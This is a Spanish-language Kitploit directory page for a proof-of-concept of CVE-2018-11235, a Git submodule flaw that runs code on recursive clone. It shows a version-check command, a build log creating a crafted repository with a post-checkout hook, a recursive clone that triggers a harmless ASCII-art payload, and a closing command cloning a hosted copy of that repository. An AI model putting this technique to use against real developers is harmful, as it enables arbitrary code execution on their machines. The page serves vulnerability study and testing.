Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-11235 — CVE-2018-11235(PoC && Exp) | Kitploit
Herramientas/GitHubGitHub/anonymking/cve-2018-11235
Análisis de VulnerabilidadesExplotaciónSeguridad de Cadena de SuministroAprendizaje y EducaciónExplotación de BinariosLabs y Práctica
GitHubanonymking/cve-2018-11235

CVE-2018-11235

CVE-2018-11235(PoC && Exp)

Ver Repositorio
1hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-11235

Resumen de la vulnerabilidad

  • Nombre de la vulnerabilidad: Vulnerabilidad de seguridad de Git
  • ID CNNVD: CNNVD-201805-1020
  • Nivel de peligro: Alto
  • ID CVE: CVE-2018-11235
  • Tipo de vulnerabilidad: Problema de característica de seguridad
  • Fecha de publicación: 2018-05-31
  • Tipo de amenaza: Remota
  • Fecha de actualización: 2019-04-01
  • Proveedor: git-scm
  • Fuente de la vulnerabilidad:
  • Descripción de la vulnerabilidad: Git es un sistema de control de versiones distribuido gratuito y de código abierto desarrollado por el desarrollador de software estadounidense Linus Torvalds. Existe una vulnerabilidad de seguridad en Git que se origina cuando los nombres de submódulos se agregan al directorio $GIT_DIR/modules, el programa no valida correctamente los nombres de submódulos provenientes de archivos .gitmodules no confiables. Los atacantes remotos pueden aprovechar archivos .gitmodules especialmente diseñados para ejecutar código arbitrario. Las siguientes versiones se ven afectadas: versiones anteriores a Git 2.13.7, versiones 2.14.x anteriores a 2.14.4, versiones 2.15.x anteriores a 2.15.2, versiones 2.16.x anteriores a 2.16.4, versiones 2.17.x anteriores a 2.17.1.
  • Versiones afectadas (información de: 《Detección y reparación de la ejecución de código arbitrario en Git (CVE-2018-11235)》):
root@kitploit:~
Versión 2.13.x, si es menor a 2.13.7, la vulnerabilidad existe
Versión 2.14.x, si es menor a 2.14.4, la vulnerabilidad existe
Versión 2.15.x, si es menor a 2.15.2, la vulnerabilidad existe
Versión 2.16.x, si es menor a 2.16.4, la vulnerabilidad existe
Versión 2.17.x, si es menor a 2.17.1, la vulnerabilidad existe
  • Verifique si su versión está afectada (información de: 《Detección y reparación de la ejecución de código arbitrario en Git (CVE-2018-11235)》):
root@kitploit:~
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
  1. Si se muestra Initialized empty Git repository in /tmp/test/.git/, indica que la vulnerabilidad existe
  2. Si se muestran las siguientes líneas, indica que la versión no está afectada:
root@kitploit:~
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules

Reproducción de la vulnerabilidad

  • Debido a los mecanismos de seguridad de GitHub, no se pueden cargar proyectos maliciosos, por lo que puede ejecutar el script build.sh para construir este proyecto localmente con fines de aprendizaje y prueba.
  • La implementación de este proyecto se basa principalmente en CVE-2018-11235-DEMO y CVE-2018-11235.
  • La versión de Git que utilicé es git-2.12.1.
  • El proceso y el efecto son los siguientes:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
 29 files changed, 560 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 Submodule
 create mode 100644 modules/1/2/3/4/payload/HEAD
 create mode 100644 modules/1/2/3/4/payload/config
 create mode 100644 modules/1/2/3/4/payload/description
 create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
 create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
 create mode 100644 modules/1/2/3/4/payload/index
 create mode 100644 modules/1/2/3/4/payload/info/exclude
 create mode 100644 modules/1/2/3/4/payload/logs/HEAD
 create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
 create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
 create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
 create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
 create mode 100644 modules/1/2/3/4/payload/packed-refs
 create mode 100644 modules/1/2/3/4/payload/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
 create mode 120000 modules/payload
 create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$ 
[anonymking@localhost test]$ 
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
  • El código malicioso que construí en el payload simplemente imprime un Buda, por lo que ver al Buda significa que la prueba fue exitosa.

Referencias

  1. http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  2. https://www.anquanke.com/post/id/146909
  3. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  4. https://xz.aliyun.com/t/2371
  5. https://github.com/CHYbeta/CVE-2018-11235-DEMO
  6. https://atorralba.github.io/CVE-2018-11235/
  7. https://github.com/Rogdham/CVE-2018-11235

Descubrimiento accidental

  • ¡Conseguí construir este proyecto con éxito en Coding! — CVE-2018-11235
  • Cómo usarlo:
root@kitploit:~
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test
Descargar herramienta